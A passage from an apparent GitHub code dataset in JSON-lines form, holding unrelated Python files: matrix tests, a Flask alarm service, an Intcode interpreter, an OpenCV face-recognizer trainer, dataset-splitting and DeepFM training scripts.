200\nOUTPUT_UNITS = 20\nOUTPUT_ACTIVATION = 'softmax'\nLOSS_FUNCTION = 'sparse_categorical_crossentropy'\n\nPROJECT_NAME = \"character trajectories\"\nDATA_DIR = os.path.join(\"datasets\", PROJECT_NAME)\nDATA_DIR = os.path.join(PROJECT_ROOT, DATA_DIR)\n\n\ndef test_spectral_radius():\n x = []\n y = []\n for _ in range(0, 100):\n sr_real = random.uniform(1, 5)\n size = int(random.uniform(100, 500))\n tensor = generate_matrix((size, size), sr_real, 1)\n sr = get_spectral_radius(tensor)\n x.append(size)\n y.append(sr.numpy() - sr_real)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage error:\", sum(y) / len(y))\n print(\"Generate plot:\")\n matplotlib.pyplot.scatter(x, y)\n matplotlib.pyplot.show()\n\n\ndef test_compositions_of_matrix():\n x = []\n y = []\n for _ in range(0, 1):\n sr_real = random.uniform(0, 1)\n size = int(random.uniform(100, 500))\n tensor = generate_matrix((size, size), sr_real, connectivity=0.5)\n sr = get_spectral_radius(tensor)\n x.append(size)\n y.append(sr.numpy() - sr_real)\n # print(sr, sr_real)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage error:\", sum(y) / len(y))\n\n\ndef test_connectivity():\n x = []\n y = []\n for _ in range(0, 1000):\n sr_real = random.uniform(0, 1)\n size = int(random.uniform(100, 500))\n tensor = unipi_generate_matrix((size, size), sr_real)\n zeros = (size * size) - tf.math.count_nonzero(tensor, dtype=float).numpy()\n x.append(size)\n y.append(zeros)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage zeros:\", sum(y) / len(y))\n\n\ndef test_splits():\n partitions = [random.uniform(0., 1.) for i in range(3)]\n total = sum(partitions)\n t = list(map(lambda _x: _x / total, partitions))\n print(partitions, total)\n print(t, sum(t))\n\n\ndef test_join_matrices():\n mat1 = np.matrix('1 2; 3 4')\n mat2 = np.matrix('5 6; 7 8')\n mat3 = np.matrix('9 10; 11 12')\n print(join_matrices([[mat1, mat2], [mat3, mat1]]))\n\n\ndef unipi_call(inputs, state, kernel, recurrent_kernel):\n input_part = tf.matmul(inputs, kernel)\n state_part = tf.matmul(state, recurrent_kernel)\n output = input_part + state_part\n return output\n\n\ndef tf_call(inputs, state, kernel, recurrent_kernel):\n in_matrix = tf.concat([inputs, state], axis=1) # Concat horizontally MAT.Shape [ input.y x input.x+states.x]\n weights_matrix = tf.concat([kernel, recurrent_kernel], axis=0) # Concat vertically MAT\n output = tf.linalg.matmul(in_matrix, weights_matrix)\n return output\n\n\ndef test_calls():\n dtype = tf.float64\n min_shape = 100\n max_shape = 500\n\n x = tf.random.uniform((), minval=min_shape, maxval=max_shape, dtype=tf.int32)\n y = tf.random.uniform((), minval=min_shape, maxval=max_shape, dtype=tf.int32)\n\n minmax = 3\n inputs = tf.random.uniform((x, y), minval=-minmax, maxval=minmax, dtype=dtype)\n kernel = tf.random.uniform((y, x), minval=-minmax, maxval=minmax, dtype=dtype)\n state = tf.random.uniform((x, x), minval=-minmax, maxval=minmax, dtype=dtype)\n recurrent_kernel = tf.random.uniform((x, x), minval=-minmax, maxval=minmax, dtype=dtype)\n\n w_tf = tf_call(inputs, state, kernel, recurrent_kernel)\n w_unipi = unipi_call(inputs, state, kernel, recurrent_kernel)\n\n if w_tf.shape != w_unipi.shape:\n print(\"Le shape sono diverse\")\n\n diff = (w_tf - w_unipi)\n max = 0.\n for i in diff:\n for j in i:\n val = abs(j)\n if (val > max):\n max = val\n\n n_zeri = tf.math.count_nonzero(diff).numpy()\n\n print(\"Valore piu grande:\", max.numpy())\n print(\"Valori a zero:\", n_zeri, \" Quindi il \", (n_zeri / (diff.shape[0] * diff.shape[1])) * 100, \"%\")\n\n if diff != tf.zeros((x, y), dtype=dtype):\n print(\"Le matrici sono differenti. unipi_call != tf_call\")\n else:\n print(\"Le matrici sono uguali. unipi_call == tf_call\")\n\n\ndef benchmark_calls():\n min_v = 900\n max_v = 1000\n time_tf = []\n time_uni = []\n total_time = time()\n for i in range(10000):\n x = tf.random.uniform((), minval=min_v, maxval=max_v, dtype=tf.int32)\n y = tf.random.uniform((), minval=min_v, maxval=max_v, dtype=tf.int32)\n inputs = tf.random.uniform((x, y), minval=-1, maxval=1, dtype=tf.float32)\n kernel = tf.random.uniform((y, x), minval=-1, maxval=1, dtype=tf.float32)\n state = tf.random.uniform((x, x), minval=-1, maxval=1, dtype=tf.float32)\n recurrent_kernel = tf.random.uniform((x, x), minval=-1, maxval=1, dtype=tf.float32)\n\n start = time()\n _ = unipi_call(inputs, state, kernel, recurrent_kernel)\n time_uni.append(time() - start)\n\n start = time()\n _ = tf_call(inputs, state, kernel, recurrent_kernel)\n time_tf.append(time() - start)\n\n print(\"Totat run time:\", time() - total_time)\n print(\"TF time: \", np.mean(time_tf), \"±\", np.std(time_tf))\n print(\"UNI time: \", np.mean(time_uni), \"±\", np.std(time_uni))\n if np.mean(time_tf) < np.mean(time_uni):\n print(\"Vince TF_call\")\n else:\n print(\"Vince UNIPI_call\")\n\n\ndef benchmark_bias():\n time_if = []\n time_plus = []\n w2 = None\n zero_init = tf.keras.initializers.Zeros()\n for _ in range(30):\n x = tf.random.uniform((), minval=10, maxval=100, dtype=tf.int32)\n y = tf.random.uniform((), minval=10, maxval=100, dtype=tf.int32)\n inputs = tf.random.uniform((x, y), minval=-1, maxval=1)\n bias = tf.random.uniform((x, y), minval=-1, maxval=1)\n start = time()\n if not isinstance(bias, zero_init):\n w2 = inputs + bias\n time_if.append(time() - start)\n start = time()\n w3 = inputs + bias\n time_plus.append(time() - start)\n print(w2)\n print(w3)\n print(\"With if :\", np.mean(time_if), \"+_\", np.std(time_if))\n print(\"Without if:\", np.mean(time_plus), \"+_\", np.std(time_plus))\n\n\ndef benchmark_inits():\n time_uniform = []\n time_glorot = []\n\n x = 1000\n uniform_init = Kernel(initializer=tf.keras.initializers.RandomUniform(minval=-1, maxval=1))\n glorot_init = Kernel()\n for _ in range(1000):\n start = time()\n w = uniform_init(shape=(x, x), dtype=tf.float32)\n time_uniform.append(time() - start)\n\n start = time()\n e = glorot_init(shape=(x, x), dtype=tf.float32)\n time_glorot.append(time() - start)\n print(\"Uniform initializer : {:.5f} ± {:.4f}s\".format(np.mean(time_uniform), np.std(time_uniform)))\n print(\"GlorotUniform initializer: {:.5f} ± {:.4f}s\".format(np.mean(time_glorot), np.std(time_glorot)))\n\n\ndef normalize(mat, sr):\n scaling = tf.math.divide_no_nan(sr, get_spectral_radius(mat))\n return tf.multiply(mat, scaling)\n\n\ndef plot_matrix(title, matrix):\n fig, ax = plt.subplots(figsize=(5, 5))\n im = ax.imshow(matrix)\n ax.set_title(title)\n # Loop over data dimensions and create text annotations.\n for i in range(matrix.shape[0]):\n for j in range(matrix.shape[1]):\n val = tf.cast(matrix[i, j], tf.float32)\n text = ax.text(j, i, \"{:.5f}\".format(val),\n ha=\"center\", va=\"center\", color=\"w\")\n fig.tight_layout()\n plt.show()\n\n\ndef test_generation_matrix():\n size_x = 10\n size_y = 10\n srx = 6.\n sry = 4.\n gsr = 2.\n\n init = tf.keras.initializers.GlorotUniform()\n\n x_mat = init((size_x, size_x))\n y_mat = init((size_y, size_y))\n xy_zero = tf.keras.initializers.Zeros()((size_x, size_y))\n\n x_norm = normalize(x_mat, srx)\n y_norm = normalize(y_mat, sry)\n xy_norm = join_matrices([[x_norm, xy_zero], [tf.transpose(xy_zero), y_norm]])\n xy_norm2 = normalize(xy_norm, gsr)\n\n xy_mat = join_matrices([[x_mat, xy_zero], [tf.transpose(xy_zero), y_mat]])\n mat_norm = normalize(xy_mat, gsr)\n\n diff = xy_norm2 - mat_norm\n\n print(\"SR xy_norm\", get_spectral_radius(xy_norm).numpy())\n print(\"SR xy_norm2\", get_spectral_radius(xy_norm2).numpy())\n print(\"\")\n print(\"SR xy_mat\", get_spectral_radius(xy_mat).numpy())\n print(\"SR mat_norm\", get_spectral_radius(mat_norm).numpy())\n print(\"\")\n print(\"SR diff\", get_spectral_radius(diff).numpy())\n\n print(\"Are equals: \", (tf.math.count_nonzero(diff) == 0).numpy())\n\n plot_matrix(\"xy_norm\", xy_norm)\n plot_matrix(\"xy_norm2\", xy_norm2)\n\n plot_matrix(\"mat_norm\", mat_norm)\n\n plot_matrix(\"DIFF\", xy_norm2 - mat_norm)\n\n\nif __name__ == '__main__':\n tf.random.set_seed(42)\n # benchmark_calls()\n reservoirs = 3\n test = [[(i, j)\n for i in range(reservoirs)]\n for j in range(reservoirs)]\n for i in test:\n for j in i:\n print(j, end=\" \")\n print()\n\n print(test)","repo_name":"SilverLuke/Tesi","sub_path":"notebooks/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29931077546","text":"for test in range(int(input())):\n arr = []\n n = int(input())\n for i in range(0,n+1):\n arr.append(list())\n for j in range(0, i):\n if j == 0:\n arr[i].append(1)\n elif j == i-1:\n arr[i].append(1)\n else:\n arr[i].append(arr[i-1][j-1]+arr[i-1][j])\n print('#' + str(test + 1))\n\n for k in range(1,n+1):\n for m in range(k):\n print(arr[k][m], end = ' ')\n print()","repo_name":"huu-k/Algorithm","sub_path":"SWEA/D2/2005. 파스칼의 삼각형/파스칼의 삼각형.py","file_name":"파스칼의 삼각형.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30917926","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image \r\n\r\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\r\n'''\r\nface.createLBPHFaceRecognizer yuz tanimada kullanilan opencv \r\nkutuphanesinde yer alan bir algoritmadir. Her bir kullanicidan \r\nalinan 50 adet goruntu face.createLBPHFaceRecognizer algoritmasinda\r\nozellik cikarimi (yuze ait noktalar) tanimlanmistir\r\n'''\r\n\r\ncascadePath = \"Classifiers/face.xml\" \r\n\r\nfaceCascade = cv2.CascadeClassifier(cascadePath);\r\n\r\npath = 'dataSet' # alinacak goruntulerin konumu (dataset klasoru)\r\n\r\ndef get_images_and_labels(path):\r\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\r\n\r\n\r\n#image_paths degiskeniene dataset klasorundeki tum dosyaların konumu\r\n#adi ve uzantisi bilgileri alinmaktadir. \r\n#\r\n\r\n #resimlerin dizi verileri için\r\n images = [] \r\n #resimlerin ID değeri\r\n labels = [] \r\n for image_path in image_paths: \r\n \r\n # alinan goruntulerin sayisi kadar donmesi icin\r\n \r\n # resim oku ve grayscale'ye dönüştür\r\n image_pil = Image.open(image_path).convert('L')\r\n \r\n \r\n # resim oku ve numpy dizi dönüştür \r\n image = np.array(image_pil, 'uint8')\r\n \r\n # resimden ID değeri okumak\r\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"face-\", \"\"))\r\n#\r\n# Face-Id(kişi no).(resim no).jpg dosyasindan \r\n# sadece resim kişi noyu almak icin kullanilir. Ornegin \r\n# face-0.1.jpg dosyasinda 0 kişinin id'si 1 ise kişinin \r\n# ikinci resmi oldugunu gostermektedir.\r\n# replace(\"face-\", \"\") ile face- silinmektedir. Geriye\r\n# 0.1.jpg kalmaktadir. \r\n# image_path)[1] ile 0.1 ifadesi kalir.\r\n# split(\".\")[0] ile noktaya gore ayir ve 0 deger olan\r\n# 0 degerini alir. \r\n#\r\n print (nbr)\r\n \r\n # resim içindeki yüz algılamak için o da eğer resim içinde sadece yüz değil\r\n faces = faceCascade.detectMultiScale(image)\r\n \r\n # resimlerden elde edilen veriler images diziye aktar ve resimlerin ID sı labels diziye aktar\r\n for (x, y, w, h) in faces:\r\n \r\n\r\n# Goruntuler ve ID degerleri ayri ayri eklenmektedir\r\n\r\n images.append(image[y: y + h, x: x + w])\r\n labels.append(nbr)\r\n \r\n cv2.imshow(\"Egitim setine yuzler eklenmektedir...\", image[y: y + h, x: x + w])\r\n cv2.waitKey(10)\r\n # images labels listesi dondurulmektedir.\r\n return images, labels\r\n\r\n\r\nimages, labels = get_images_and_labels(path)\r\n'''\r\ntest icin alinan goruntuler gosterilmektedir.\r\n'''\r\ncv2.imshow('test',images[0])\r\ncv2.waitKey(1)\r\n\r\nrecognizer.train(images, np.array(labels))\r\n'''\r\nverilen resimlerin verileri ve resim Id ları ile Yüz Tanıma \r\nalgoritmasina gore egirilmektedir\r\n'''\r\nrecognizer.save('trainer/trainer.yml') \r\n# egitim dosyalari kaydedilmektedir.\r\n# model dosyalarinin genellikle uzantisi yml olmaktadir.\r\ncv2.destroyAllWindows()\r\n","repo_name":"ZAKARIA995/Computer-Vision-Face-Detection-ML-Training-","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29674330496","text":"\"\"\"\nTo run application:\n\n1.-\n >cd entrypoints/\n >export FLASK_APP=app.py\n >flask run\n\n2.-\n >FLASK_APP=app.py flask run\n\nTo test application:\n\n >curl http://localhost:5000/\n\"\"\"\n\nimport uuid\nimport logging\n\nfrom flask import Flask, jsonify, request, current_app\nfrom services import app_service \nfrom exceptions.services_exception import ServiceException\n\n\napp = Flask(__name__)\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\n@app.route(\"/\", methods=['GET'])\ndef root():\n \"\"\"\n Root entrypoint\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /root\")\n return jsonify({'result': 'Ok'}), 200\n\n\n@app.route(\"/liveness\", methods=['GET'])\ndef liveness():\n \"\"\"\n Liveness entrypoint.\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /liveness\")\n return 'Ok', 200\n\n\n@app.route(\"/readiness\", methods=['GET'])\ndef rediness():\n \"\"\"\n Rediness entrypoint.\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /rediness\")\n return 'Ok', 200\n\n\n@app.route(\"/alarm1\", methods=['GET'])\ndef doAlarm1():\n \"\"\"\n Alarm1 entrypoint\n :return: str, código error. (510- Error de servicio de negocio)\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n current_app.logger.info(f\"[*] /alarm1\")\n app_service.setAlarm1()\n response_result = {'result': 'Ok'}\n code_result = 200\n \n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\n\n@app.route(\"/alarm2\", methods=['GET'])\ndef doAlarm2():\n \"\"\"\n Alarm1 entrypoint\n :return: str\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n\n current_app.logger.info(f\"[*] /alarm2\")\n app_service.setAlarm2()\n response_result = {'result': 'Ok'}\n code_result = 200\n\n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\n\n@app.route(\"/alarm3\", methods=['GET'])\ndef doAlarm3():\n \"\"\"\n Alarm3 entrypoint\n :return: str\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n\n current_app.logger.info(f\"[*] /alarm3\")\n app_service.setAlarm3()\n response_result = {'result': 'Ok'}\n code_result = 200\n\n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AlvaroMonsalveSerrano/Bridge-TFM","sub_path":"app/entrypoints/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31316508239","text":"import itertools\nfrom collections import defaultdict\n\nclass Intcode():\n def __init__(self, memory):\n self.memory = memory\n self.cursor = 0\n self._input = []\n self._output = []\n self.instructions = {\n 1: self.sum_instruction,\n 2: self.multiplication_instruction,\n 3: self.input_instruction,\n 4: self.output_instruction,\n 99: self.exit_instruction\n }\n super().__init__()\n\n def run(self, input=None):\n if input is not None:\n self._input = input\n res = self.tick()\n while not res:\n res = self.tick()\n return res\n\n def output(self, val):\n self._output.append(val)\n\n def get_output(self):\n return self._output\n\n def pop_input(self):\n return self._input.pop()\n\n def set_memory(self, pos, val):\n self.memory[pos] = val\n\n def get(self, position):\n return self.memory[position]\n\n def pop(self):\n val = self.memory[self.cursor]\n self.cursor += 1\n return val\n\n def pop_instruction(self):\n instruction = self.pop()\n encoded_modes, op = divmod(instruction, 100)\n modes = {i: int(x) for i, x in enumerate(reversed(str(encoded_modes)))}\n return op, modes\n\n def tick(self):\n instruction, modes = self.pop_instruction()\n handler = self.instructions.get(instruction)\n if handler is not None:\n return handler(modes)\n else:\n raise Exception(\"Unknown instruction: {}\".format(instruction))\n\n def sum_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, left + right)\n return False\n\n def multiplication_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, left * right)\n return False\n\n def input_instruction(self, modes):\n output_position = self.output_position(self.pop(), modes.pop(0, 0))\n val = self.pop_input()\n self.set_memory(output_position, val)\n return False\n\n def output_position(self, arg, mode):\n if mode == 0:\n return arg\n raise AssertionError(\"Immediate mode for output?\")\n\n def output_instruction(self, modes):\n val = self.get_arg(self.pop(), modes.pop(0, 0))\n self.output(val)\n return False\n\n def exit_instruction(self, modes):\n return True\n\n def get_arg(self, arg, mode):\n if mode == 0:\n return self.get(arg)\n if mode == 1:\n return arg\n else:\n raise Exception(\"Expected a mode to be 0 or 1. Found={}\".format(mode))\n\nclass Jumper(Intcode):\n def __init__(self, memory):\n super().__init__(memory)\n self.instructions.update(\n {\n 5: self.jump_if_true_instruction,\n 6: self.jump_if_false_instruction,\n 7: self.less_then_instruction,\n 8: self.equals_instruction,\n }\n )\n\n def set_cursor(self, pointer):\n self.cursor = pointer\n\n def jump_if_true_instruction(self, modes):\n condition = self.get_arg(self.pop(), modes.pop(0, 0))\n pointer = self.get_arg(self.pop(), modes.pop(1, 0))\n if condition != 0:\n self.set_cursor(pointer)\n\n def jump_if_false_instruction(self, modes):\n condition = self.get_arg(self.pop(), modes.pop(0, 0))\n pointer = self.get_arg(self.pop(), modes.pop(1, 0))\n if condition == 0:\n self.set_cursor(pointer)\n\n def less_then_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, int(left < right))\n return False\n\n def equals_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, int(left == right))\n return False\n\nclass IntcodeV3(Jumper):\n def __init__(self, memory):\n super().__init__(memory)\n self.memory = defaultdict(\n lambda : 0,\n {i: v for i, v in enumerate(self.memory)}\n )\n self.relative_base = 0\n self.instructions.update({\n 9: self.adjust_base_instruction\n })\n\n def adjust_base_instruction(self, modes):\n self.relative_base += self.get_arg(self.pop(), modes.pop(0, 0))\n return False\n\n def get_arg(self, arg, mode):\n if mode == 2:\n return self.get(self.relative_base + arg)\n return super().get_arg(arg, mode)\n\n def output_position(self, arg, mode):\n if mode == 2:\n return self.relative_base + arg\n return super().output_position(arg, mode)\n\ndef part1(program):\n computer = IntcodeV3(program)\n computer.run([1])\n return computer.get_output()\n\n\ndef part2(program):\n computer = IntcodeV3(program)\n computer.run([2])\n return computer.get_output()\n\nif __name__ == \"__main__\":\n with open('input') as f:\n memory = [int(x) for x in f.read().strip().split(',')]\n print(part1(memory[:]))\n print(part2(memory[:]))","repo_name":"makarchuk/advent-of-code-2019","sub_path":"day9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2205734433","text":"# -*- coding: utf-8 -*-\n# Autor: christian\nfrom django.conf.urls import patterns, url\n\nfrom . import views\n\nurlpatterns = patterns(\n 'apps.formulario_auto_correcao.views',\n url(r'^ajax_responder/$', views.ajax_responder, name='responder'),\n url(r'^baixar_correcao/(?P[0-9]+)/$', views.baixar_correcao, name='baixar_correcao'),\n)\n","repo_name":"desenvolvimento-justutor/v1","sub_path":"apps/formulario_auto_correcao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35344411953","text":"import multiprocessing\n\n\ndef worker():\n LIST.append('item')\n\n\nLIST = []\n\n\nif __name__ == \"__main__\":\n processes = [\n multiprocessing.Process(target=worker)\n for _ in range(5)\n ]\n for p in processes:\n p.start()\n for p in processes:\n p.join()\n print(LIST)\n\n \"\"\"В Python процессы выполняются независимо и имеют собственное пространство памяти.\n все процессы могут использовать глобальные данные, но у них будет разная память для обработки, поэтому они не влияют друг на друга.\"\"\"","repo_name":"phienhoang/phienhoang_python","sub_path":"w11/N5.py","file_name":"N5.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30283650458","text":"# Advent of Code: Day 2\n\n## Part 1\ndef part1(L):\n H = 0\n D = 0\n for line in L:\n direction, q = line.split()\n q = int(q)\n if direction == \"forward\":\n H += q\n\n elif direction == \"down\":\n D += q\n\n elif direction == \"up\":\n D -= q\n\n return H * D\n\n## Part 2\ndef part2(L):\n H = 0\n D = 0\n A = 0\n for line in L:\n direction, q = line.split()\n q = int(q)\n\n if direction == \"forward\":\n H += q\n D += A * q\n\n elif direction == \"down\":\n A += q\n\n elif direction == \"up\":\n A -= q\n\n return H * D\n\nwith open(\"2021/input/2.txt\") as F:\n L = F.readlines()\n\n print(\"Begin Part 1:\")\n print(\"assert part1(L) == 1727835\")\n assert part1(L) == 1727835\n print(\"Part 1 Successful\\n\")\n\n print(\"Begin Part 2:\")\n print(\"assert part2(L) == 1544000595\")\n assert part2(L) == 1544000595\n print(\"Part 2 Successful\\n\")\n","repo_name":"Christofosho/advent-of-code","sub_path":"2021/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10940766921","text":"import argparse\nfrom argparse import Namespace\nfrom pathlib import Path\n\nfrom omegaconf import OmegaConf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef create_dataset(filepath: Path) -> pd.DataFrame:\n with open(filepath, mode=\"rb\") as io:\n list_of_sentences = io.readlines()\n data = []\n\n for sentence in list_of_sentences:\n try:\n decoded_sentence = sentence.strip().decode(\"utf-8\")\n label = int(decoded_sentence[0])\n document = decoded_sentence[2:]\n data.append({\"document\": document, \"label\": label})\n except UnicodeDecodeError:\n continue\n\n return pd.DataFrame(data)\n\n\ndef main(args: Namespace) -> None:\n parent_config_dir = Path(\"conf\")\n child_config_dir = parent_config_dir / args.dataset\n\n parent_dataset_dir = Path(\"dataset\")\n child_dataset_dir = parent_dataset_dir / args.dataset\n\n pipeline_config_dir = child_config_dir / \"pipeline\"\n pipeline_config_path = pipeline_config_dir / f\"{args.pipeline}.yaml\"\n pipeline_config = OmegaConf.load(pipeline_config_path)\n\n if args.dataset == \"nsmc\":\n # loading dataset\n dataset = pd.read_csv(pipeline_config.dataset.path.train, sep=\"\\t\").loc[\n :, [\"document\", \"label\"]\n ]\n dataset = dataset.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n train, validation = train_test_split(\n dataset, test_size=args.valid_ratio, random_state=args.seed\n )\n test = pd.read_csv(pipeline_config.dataset.path.test, sep=\"\\t\").loc[\n :, [\"document\", \"label\"]\n ]\n test = test.loc[test[\"document\"].isna().apply(lambda elm: not elm), :]\n\n elif args.dataset == \"trec6\":\n\n dataset = create_dataset(pipeline_config.dataset.path.train)\n dataset = dataset.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n\n train, validation = train_test_split(\n dataset, test_size=args.valid_ratio, random_state=args.seed\n )\n\n test = create_dataset(pipeline_config.dataset.path.test)\n test = test.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n\n path_dict = {\n \"train\": str(child_dataset_dir / \"train.txt\"),\n \"validation\": str(child_dataset_dir / \"validation.txt\"),\n \"test\": str(child_dataset_dir / \"test.txt\"),\n }\n\n pipeline_config.dataset.path.update(path_dict)\n OmegaConf.save(pipeline_config, pipeline_config_path)\n\n train.to_csv(pipeline_config.dataset.path.train, sep=\"\\t\", index=False)\n validation.to_csv(pipeline_config.dataset.path.validation, sep=\"\\t\", index=False)\n test.to_csv(pipeline_config.dataset.path.test, sep=\"\\t\", index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--dataset\", type=str, default=\"nsmc\", choices=[\"nsmc\", \"trec6\"]\n )\n parser.add_argument(\"--pipeline\", type=str, default=\"pv00\")\n parser.add_argument(\"--valid_ratio\", type=float, default=0.1)\n parser.add_argument(\"--seed\", type=int, default=42)\n args = parser.parse_args()\n main(args)\n","repo_name":"HephaestusProject/pytorch-Sencnn","sub_path":"build_dataset.py","file_name":"build_dataset.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"71161482132","text":"import logging\nimport random\nfrom time import time\nfrom datetime import datetime\nimport pandas as pd\nimport torch\nimport nni\nimport sys\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport os\nsys.path.append(\"..\")\nfrom utils import logCof\n# from models import MF, SmoothAUCLoss, BPR\nfrom deepctr_torch.inputs import SparseFeat, DenseFeat, get_feature_names\nfrom deepctr_torch.models import DeepFM\n\n\ncurrent_time = datetime.now().strftime('%Y%m%d%H%M%S')\n\n\ndef main(args):\n # items_data = pd.read_csv(os.path.join(args[\"datadir\"], \"items_info.csv\"))\n\n torch.manual_seed(args[\"seed\"])\n random.seed(args[\"seed\"])\n torch.cuda.manual_seed(args[\"seed\"])\n\n sparse_features = {\"userInt\": 5560, \"newsInt\": 17000}\n # dense_features = [str(x) for x in range(100)]\n dense_features = []\n\n fixlen_feature_columns = [SparseFeat(feat, sparse_features[feat], embedding_dim=args[\"embedding_dim\"]) for feat in sparse_features] \\\n + [DenseFeat(feat, 1, ) for feat in dense_features]\n linear_feature_columns = fixlen_feature_columns\n dnn_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n model = DeepFM(linear_feature_columns=linear_feature_columns,\n dnn_feature_columns=dnn_feature_columns,\n lr=args[\"lr\"],\n l2_reg_embedding=args[\"l2_reg_embedding\"],\n l2_reg_dnn=args[\"l2_reg_dnn\"],\n device=device,\n dnn_hidden_units=(args[\"layer_size1\"], args[\"layer_size2\"]), #\n # dnn_hidden_units=(), #\n dnn_dropout=args[\"dropout\"],\n dnn_use_bn=True\n )\n model.compile(\"adam\", 'smooth_auc_loss',\n metrics=[\"binary_crossentropy\", 'auc_personal'])\n\n if not args[\"only_test\"]:\n\n train_data = pd.read_csv(os.path.join(args[\"datadir\"], \"train_data1.csv\"))\n val_data = pd.read_csv(os.path.join(args[\"datadir\"], \"val_data.csv\"))\n train3 = pd.read_pickle(os.path.join(args[\"datadir\"], \"train3.pickle\"))[\"train_data3_user_list\"]\n train_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n val_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n\n callback = EarlyStopping(monitor=\"val_auc_personal\", patience=10, verbose=1, mode=\"max\")\n print(\"***************************** 开始训练 ******************************\")\n history, best_val_score, best_model_params = model.fit_SAUC(logger, train3, train_data[[name for name in feature_names] + [\"label\"]],\n batch_size=args[\"batch_size\"], epochs=args[\"epochs\"], verbose=1,\n validation_data=[{name: val_data.drop(columns=[\"label\"])[name] for name in feature_names}, val_data.label.values],\n callbacks=[callback],\n shuffle=True, tau=args[\"tau\"])\n nni.report_final_result(best_val_score)\n # save model\n dirname = os.path.dirname(os.path.abspath(args[\"model_path\"]))\n os.makedirs(dirname, exist_ok=True)\n model_name = args[\"project_name\"] + \"_\" + current_time + \"_tau_\" + str(args[\"tau\"]) + \"_\" + str(best_val_score)[:8] + \".pt\"\n torch.save(best_model_params, os.path.join(dirname, model_name))\n print(\"***************************** testing ******************************\")\n test_data = pd.read_csv(os.path.join(args[\"datadir\"], \"test_data.csv\"))\n test_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n eval_result = model.test_personal({name: test_data.drop(columns=[\"label\"])[name] for name in feature_names}, test_data.label.values)\n for name, values in eval_result.items():\n print(name, values)\n else:\n test_model_name = \"CiteULike_SAUC_20220927173548_tau_0.02_0.900003.pt\"\n test_data = pd.read_csv(os.path.join(args[\"datadir\"], \"test_data.csv\"))\n test_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n model_dict = model.load_state_dict(torch.load(os.path.join(\"../saved_models\", test_model_name)))\n print(\"test on model: \", test_model_name)\n eval_result = model.test_personal({name: test_data.drop(columns=[\"label\"])[name] for name in feature_names}, test_data.label.values)\n for name, values in eval_result.items():\n print(name, values)\n\n\ndef get_default_parameters():\n # 要调参的参数\n params = \\\n {\n \"lr\": 